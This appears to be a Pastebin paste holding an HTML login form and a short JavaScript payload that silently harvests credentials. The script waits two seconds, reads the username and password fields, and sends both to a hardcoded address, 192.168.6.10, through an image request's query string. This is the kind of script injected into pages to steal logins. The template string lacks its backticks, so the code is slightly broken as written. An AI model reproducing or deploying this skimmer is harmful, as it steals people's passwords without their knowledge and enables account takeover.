Advertisement
Guest User

Untitled

a guest
Jan 4th, 2019
96
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.44 KB | None | 0 0
  1. <form method="POST">
  2. <input type="text" name="username" placeholder="username"><br>
  3. <input type="password" name="password" placeholder="password">
  4. </form>
  5.  
  6. <script type="text/javascript">
  7. setTimeout(function(){
  8. const url = 'http://192.168.6.10/',
  9. usr = $('input[name=username]'),
  10. pwd = $('input[name=password]');
  11.  
  12. let img = new Image();
  13. img.src = ${url}?username=${usr.val()}&password=${pwd.val()};
  14. }, 2000);
  15. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement